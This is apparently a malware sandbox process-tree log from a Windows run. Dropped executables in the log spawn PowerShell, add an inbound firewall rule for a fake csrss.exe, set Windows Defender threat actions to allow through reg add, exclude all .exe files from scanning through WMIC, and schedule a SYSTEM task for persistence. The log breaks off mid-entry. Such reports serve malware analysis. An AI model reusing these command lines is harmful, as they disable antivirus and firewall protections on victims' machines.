"C:\Users\Admin\Pictures\DNZVPkobIhXsULJ7mGbVg7jM.exe"
4⤵
PID:6320

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1260

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:6960

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:6908

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:848

C:\Users\Admin\Pictures\99TxHB1tlFE0cLyRLsdu2Dhh.exe
"C:\Users\Admin\Pictures\99TxHB1tlFE0cLyRLsdu2Dhh.exe"
3⤵
- Executes dropped EXE
PID:4876

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5804

C:\Users\Admin\Pictures\99TxHB1tlFE0cLyRLsdu2Dhh.exe
"C:\Users\Admin\Pictures\99TxHB1tlFE0cLyRLsdu2Dhh.exe"
4⤵
PID:6444

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5824

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:6372

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2368

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5040

C:\Users\Admin\Pictures\t0ZJltHnOCycHjf0cl6WdLUo.exe
"C:\Users\Admin\Pictures\t0ZJltHnOCycHjf0cl6WdLUo.exe"
3⤵
- Executes dropped EXE
PID:3008

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3348

C:\Users\Admin\Pictures\t0ZJltHnOCycHjf0cl6WdLUo.exe
"C:\Users\Admin\Pictures\t0ZJltHnOCycHjf0cl6WdLUo.exe"
4⤵
PID:6000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:6880

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:6164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:4336

C:\Users\Admin\Pictures\RNrjlDvA4n49U6cuQXKGO066.exe
"C:\Users\Admin\Pictures\RNrjlDvA4n49U6cuQXKGO066.exe"
3⤵
- Executes dropped EXE
PID:1776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5816

C:\Users\Admin\Pictures\RNrjlDvA4n49U6cuQXKGO066.exe
"C:\Users\Admin\Pictures\RNrjlDvA4n49U6cuQXKGO066.exe"
4⤵
PID:3564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1104

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:3132

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2916

C:\Users\Admin\Pictures\brHNRxIVXIkDJYB98V9UpHmN.exe
"C:\Users\Admin\Pictures\brHNRxIVXIkDJYB98V9UpHmN.exe"
3⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\7zS8920.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
PID:4992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:964

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:2948

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:3068

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:4532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:5008

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:3848

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:2952

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:2720

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:792

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:3668

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:3840

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:4068

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:3536

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:4532

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:3564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:2876

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:6380

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:1580

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:5268

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:5176

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 10:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8920.tmp\Install.exe\" it /SNVdidQTNT 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:3600

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:5248

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:5284

C:\Users\Admin\Pictures\Lgrjr5Dc9lXjlGCKRf22sk1E.exe
"C:\Users\Admin\Pictures\Lgrjr5Dc9lXjlGCKRf22sk1E.exe"
3⤵
PID:4104

C:\Users\Admin\AppData\Local\Temp\7zS9C2B.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:3292

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:5240

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:5352

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:5640

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:5144

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:5680

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:6088

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:6620

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:6728

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:7024

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:7128

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:7140

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:7160

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:6436

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:6252

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:1844

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:1568

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:5216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:5364

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:6020

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 10:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS9C2B.tmp\Install.exe\" it /tWididjgmG 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:5700

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:5376

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:4928

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:5612

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4492 -ip 4492
1⤵
PID:2284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
1⤵
PID:2076

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=3204 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:3
1⤵
PID:3392

C:\Users\Admin\AppData\Local\Temp\7zS8920.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8920.tmp\Install.exe it /SNVdidQTNT 385118 /S
1⤵
PID:5428

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:5648

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:5276

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:5408

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:6176

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:6676

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:6820

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:7048

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:6084

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4572

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:6088

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:5560

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:5572

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:6712

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5544

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:6832

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:5336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5280

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:7016

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:6148

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:6176

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:3840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6352

C:\Windows\SysWOW64\reg.exe
